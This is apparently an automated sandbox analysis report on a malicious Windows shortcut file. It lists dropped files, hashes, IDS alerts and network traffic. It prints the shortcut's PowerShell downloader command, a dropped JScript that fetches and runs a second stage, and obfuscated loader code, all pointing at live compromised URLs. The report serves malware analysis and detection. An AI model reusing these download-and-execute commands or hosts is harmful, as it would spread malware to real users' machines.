                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              03:14:00API Interceptor125x Sleep call for process: powershell.exe modified
                                              09:14:06Task SchedulerRun new task: 48dYPKZW1 path: wscript s>C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              46.254.34.201http://bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousUnknownBrowse
                                              • bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exe

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              SERVERPLAN-ASITG9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                              • 193.70.147.14
                                              Ordine Electricas BC Corp PO EDC0969388.batGet hashmaliciousGuLoaderBrowse
                                              • 185.81.4.143
                                              Play_VM-Now(Gdunphy)CQDM.htmGet hashmaliciousUnknownBrowse
                                              • 93.95.216.8
                                              Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                              • 93.95.216.8
                                              citibank_0824_statement.lnkGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              https://www.bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousKoiLoaderBrowse
                                              • 46.254.34.201
                                              http://bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              https://www.baidu.com/link?url=PR7h_t_ZizoWZdjSMLubWVmCX_p6239c2z0KzH4cKS_&wd=ZC5rZW5uZWR5QGNoY2ZsLm9yZw==Get hashmaliciousUnknownBrowse
                                              • 46.254.36.239
                                              ikFn0h3xhF.elfGet hashmaliciousMiraiBrowse
                                              • 46.30.243.162

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0eG9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              INTRUM65392.pdf.lnkGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 46.254.34.201
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 46.254.34.201
                                              P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 46.254.34.201
                                              https://Lakeheadu.hlov.de/Szii3aFWcmivgihoevuc/trTlqgskL4/K3qRQz5Ggziclxgen/t3JiPvu/Szii3aFWcmivgihoevuc/Advising/YSxMdD/lakeheadu.ca/Szii3aFWcmivgihoevucGet hashmaliciousHTMLPhisherBrowse
                                              • 46.254.34.201
                                              http://www.abvt.com.au/netsuite-userGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              http://www.abvt.com.au/netsuite-userGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                              • 46.254.34.201
                                              Content Collaboration Terms.dll.exeGet hashmaliciousLummaC StealerBrowse
                                              • 46.254.34.201

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\M77M75P1ZQW1.js

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with very long lines (398)
                                              Category:dropped
                                              Size (bytes):1288
                                              Entropy (8bit):5.718287409851133
                                              Encrypted:false
                                              SSDEEP:24:iJr+PoLb+CIzf5j1MVL+kUE+QQAV0iS/sqQ1cEE2Rgjzku/uN:ErK0KZVjSVCRH2SnMbl+Eu/uN
                                              MD5:A906D95B1C91D40D31FECF00AFA3E7DC
                                              SHA1:3117952271169B239735A6DAEACBCAFF72CFCE29
                                              SHA-256:FEBB94BE2ED439F5F87C57BF5CE968DFC85972D67DEAA711BE8436AF3B869922
                                              SHA-512:DC395FCC18FCBEDF4A89235AA1400F17BD4F057842AAB12A0C4B7E659B570F318487D30E3EFD6C159BE20FCC2C30C58F5A5C18EAD7AB1EC82C18A45B70FD751C
                                              Malicious:false
                                              Preview:var f1="Scr",f2="ing.Fi",f3="stemOb".var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject").var w1="WSc",w2="riPt",w4="eLl".var wsh=w1+w2+".sH"+w4.var bbj=new ActiveXObject(wsh).var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth==64?"SysWOW64":"System32".var rd=bbj.ExpandEnvironmentStrings("%SYSTEMROOT%")+"\\"+fldr+"\\WindowsPowerShell\\v1.0\\powershell.exe".var agn='r'+bbj.RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid')+'r.js'.if (WScript.ScriptName != agn) {..var fs5="yFi"..try {..fso["Cop"+fs5+"le"](WScript.ScriptFullName, bbj.ExpandEnvironmentStrings("%programdata%")+"\\"+agn)..} catch (e) {}.}.var mtx_name="7zO7AOF6OP22".var mtx_file = bbj.ExpandEnvironmentStrings("%t"+"emp%")+"\\"+mtx_name.var fs1="leteFi".var fs2="leExis".try {..fso["De"+fs1+"le"](mtx_file).} catch (e) {}.if (!fso["Fi"+fs2+"ts"](mtx_file)).{..bbj.Run(rd+" -command \"$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'ht

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Preview:@...e...........................................................

                                              C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):304
                                              Entropy (8bit):5.328674012558457
                                              Encrypted:false
                                              SSDEEP:6:qcYrhvmVs8Gz797cfoKKomOLFULvrlAZ9HFiVu5h3BbRnKKomOmU:HYrhvF8879qonOxirauIBbRnnOmU
                                              MD5:6CA08CD27EF0130E6346AB93687DD58B
                                              SHA1:4D24FB609D12E2AA47733F34DDE1E73A83F65DDA
                                              SHA-256:8F130832840DE04702D15D47DAD987367B9E3EF77711D0E47969207C483DE62B
                                              SHA-512:FF597D54AEA36ABF16A9D1BFEA637F23264724EF4238D0995C4FB6D22AD4D210A4A8148EC6974D3E73A4DE821DA11EEBAF0F9F1E2ABBF25484B7B217FEC798FB
                                              Malicious:true
                                              Preview:var fnn = new ActiveXObject("WScript.Shell")..fnn.Run("powershell -command \"IWR -outfi $env:programdata\\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + " /f; wscript $env:programdata\\M77M75P1ZQW1.js \"", 0)

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_115qz1dn.1oh.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lwfixj5.m1e.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eov0qpyo.kup.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fic3i2l3.tts.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwyqdzms.fyk.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idighnof.pa5.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_np3u5lu3.wb2.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wh45t2ag.5ym.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TO3EHBI6S3OLBG1DPH1J.temp

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5395
                                              Entropy (8bit):3.4927722077583536
                                              Encrypted:false
                                              SSDEEP:48:ycife7eEdLXuHbk2D+WXUYlz7SogZo9E2D+WXUYlI7SogZop1:DeeaMuY2D+2UY8Hh2D+2UYJHy
                                              MD5:DBCA95EE6ADF52CF31DB35D1C09CA957
                                              SHA1:B020646F315F27BF1C32F5BF799B007F7D22CEA2
                                              SHA-256:AA251DAF8AD023029E0170553A3C3229AA9855C10763951A829606680A7AA5B2
                                              SHA-512:C4691660482C3FB333ADB3FBA22120088E264C02C1CC2339E56BEC98EBC591910C7280E6B30FCA6CB56D05EF927F480A859075D14F67C5718A0ED5CFFBAE814B
                                              Malicious:false
                                              Preview:...................................FL..................F.`.. ....B.l......&N[E..I..M[E...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O........Tn......&N[E....j.2......Y.A .6K2G0G~1.LNK..N......DW.r.Y.A...........................v..6.K.2.g.0.G.M.m.I.E...l.n.k.......U...............-.......T............(d].....C:\Users\user\Desktop\6K2g0GMmIE.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\a1f0dc316e092dfa.customDestinations-ms (copy)

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5395
                                              Entropy (8bit):3.4927722077583536
                                              Encrypted:false
                                              SSDEEP:48:ycife7eEdLXuHbk2D+WXUYlz7SogZo9E2D+WXUYlI7SogZop1:DeeaMuY2D+2UY8Hh2D+2UYJHy
                                              MD5:DBCA95EE6ADF52CF31DB35D1C09CA957
                                              SHA1:B020646F315F27BF1C32F5BF799B007F7D22CEA2
                                              SHA-256:AA251DAF8AD023029E0170553A3C3229AA9855C10763951A829606680A7AA5B2
                                              SHA-512:C4691660482C3FB333ADB3FBA22120088E264C02C1CC2339E56BEC98EBC591910C7280E6B30FCA6CB56D05EF927F480A859075D14F67C5718A0ED5CFFBAE814B
                                              Malicious:false
                                              Preview:...................................FL..................F.`.. ....B.l......&N[E..I..M[E...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O........Tn......&N[E....j.2......Y.A .6K2G0G~1.LNK..N......DW.r.Y.A...........................v..6.K.2.g.0.G.M.m.I.E...l.n.k.......U...............-.......T............(d].....C:\Users\user\Desktop\6K2g0GMmIE.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e................................................................................................................

                                              Static File Info

                                              General

                                              File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:55 2024, atime=Mon Apr 8 20:19:11 2024, length=455680, window=hidenormalshowminimized
                                              Entropy (8bit):3.386241789407027
                                              TrID:
                                              • Windows Shortcut (20020/1) 100.00%
                                              File name:6K2g0GMmIE.lnk
                                              File size:3'971 bytes
                                              MD5:34ee898cb6c5ae305685129bd0b02ceb
                                              SHA1:72c04950fa82ea474c945f31dc3e7a32635689ae
                                              SHA256:215ff81b6f3a50e48d9f5acfb89f5ea3a1afd59dddbb0666f7ce97a922f60326
                                              SHA512:7bf440741559ffffda909092e32329635eed5a5afd31316f58a4080f8855c57d9399f4b25d6535a490e5c28727586209e3ff7c44c4d2e947c837ab58272b976d
                                              SSDEEP:48:8Ak110gy1sAT1OnPcQb4kGbRVMwmEbS0A+wIwdoITXuHXqTx:8Ak127sEO064kYQwmCA+wGau3
                                              TLSH:8E81AD102BF60718E7F39B3EE87AB251997B7855DE21CACE0091424D0872A15E879F7F
                                              File Content Preview:L..................F.B.. .....qf.....S'..@..N.rf.................................P.O. .:i.....+00.../C:\...................V.1.....sY....Windows.@........OwHzYD}.... .......................7.W.i.n.d.o.w.s.....Z.1.....zY+n..System32..B........OwHzY........

                                              File Icon

                                              Icon Hash:72d282828e8d8dd5

                                              Static Windows Shortcut Info

                                              General

                                              Relative Path:..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Command Line Argument: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;
                                              Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-12-03T09:14:06.557964+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54970546.254.34.201443TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 3, 2024 09:14:02.533338070 CET49704443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:02.533382893 CET4434970446.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:02.533482075 CET49704443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:02.542021036 CET49704443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:02.542038918 CET4434970446.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:04.021791935 CET4434970446.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:04.021868944 CET49704443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:04.025494099 CET49704443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:04.025506020 CET4434970446.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:04.025724888 CET4434970446.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:04.036724091 CET49704443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:04.083337069 CET4434970446.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:04.571867943 CET4434970446.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:04.571935892 CET4434970446.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:04.572000027 CET49704443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:04.576881886 CET49704443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:04.585788965 CET49705443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:04.585824966 CET4434970546.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:04.585901022 CET49705443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:04.586122990 CET49705443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:04.586134911 CET4434970546.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:06.012679100 CET4434970546.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:06.015074968 CET49705443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:06.015099049 CET4434970546.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:06.558037043 CET4434970546.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:06.558119059 CET4434970546.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:06.558166027 CET49705443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:06.558598995 CET49705443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:10.180546045 CET49706443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:10.180603981 CET4434970646.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:10.180664062 CET49706443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:10.930929899 CET49706443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:10.930962086 CET4434970646.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:12.455020905 CET4434970646.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:12.455146074 CET49706443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:12.457765102 CET49706443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:12.457776070 CET4434970646.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:12.458050966 CET4434970646.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:12.463876963 CET49706443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:12.511333942 CET4434970646.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:13.020970106 CET4434970646.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:13.021044016 CET4434970646.254.34.201192.168.2.5
                                              Dec 3, 2024 09:14:13.021107912 CET49706443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:14:13.080809116 CET49706443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:15:04.480586052 CET49803443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:15:04.480650902 CET4434980346.254.34.201192.168.2.5
                                              Dec 3, 2024 09:15:04.480793953 CET49803443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:15:04.484112978 CET49803443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:15:04.484128952 CET4434980346.254.34.201192.168.2.5
                                              Dec 3, 2024 09:15:06.116766930 CET4434980346.254.34.201192.168.2.5
                                              Dec 3, 2024 09:15:06.116851091 CET49803443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:15:06.121839046 CET49803443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:15:06.121851921 CET4434980346.254.34.201192.168.2.5
                                              Dec 3, 2024 09:15:06.122065067 CET4434980346.254.34.201192.168.2.5
                                              Dec 3, 2024 09:15:06.130834103 CET49803443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:15:06.171334982 CET4434980346.254.34.201192.168.2.5
                                              Dec 3, 2024 09:15:07.726494074 CET4434980346.254.34.201192.168.2.5
                                              Dec 3, 2024 09:15:07.726567030 CET4434980346.254.34.201192.168.2.5
                                              Dec 3, 2024 09:15:07.726630926 CET49803443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:15:07.739803076 CET49803443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:16:03.933017015 CET49932443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:16:03.933046103 CET4434993246.254.34.201192.168.2.5
                                              Dec 3, 2024 09:16:03.933600903 CET49932443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:16:03.936938047 CET49932443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:16:03.936949968 CET4434993246.254.34.201192.168.2.5
                                              Dec 3, 2024 09:16:05.440803051 CET4434993246.254.34.201192.168.2.5
                                              Dec 3, 2024 09:16:05.440916061 CET49932443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:16:05.442822933 CET49932443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:16:05.442828894 CET4434993246.254.34.201192.168.2.5
                                              Dec 3, 2024 09:16:05.443057060 CET4434993246.254.34.201192.168.2.5
                                              Dec 3, 2024 09:16:05.448971987 CET49932443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:16:05.495330095 CET4434993246.254.34.201192.168.2.5
                                              Dec 3, 2024 09:16:05.999113083 CET4434993246.254.34.201192.168.2.5
                                              Dec 3, 2024 09:16:05.999181032 CET4434993246.254.34.201192.168.2.5
                                              Dec 3, 2024 09:16:05.999243021 CET49932443192.168.2.546.254.34.201
                                              Dec 3, 2024 09:16:19.434252024 CET49932443192.168.2.546.254.34.201

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 3, 2024 09:14:02.386368036 CET5826653192.168.2.51.1.1.1
                                              Dec 3, 2024 09:14:02.527230978 CET53582661.1.1.1192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 3, 2024 09:14:02.386368036 CET192.168.2.51.1.1.10xc2c8Standard query (0)www.italialife24.itA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 3, 2024 09:14:02.527230978 CET1.1.1.1192.168.2.50xc2c8No error (0)www.italialife24.ititalialife24.itCNAME (Canonical name)IN (0x0001)false
                                              Dec 3, 2024 09:14:02.527230978 CET1.1.1.1192.168.2.50xc2c8No error (0)italialife24.it46.254.34.201A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.italialife24.it

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.54970446.254.34.2014434508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-03 08:14:04 UTC113OUTGET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1
                                              Host: www.italialife24.it
                                              Connection: Keep-Alive
                                              2024-12-03 08:14:04 UTC253INHTTP/1.1 200 OK
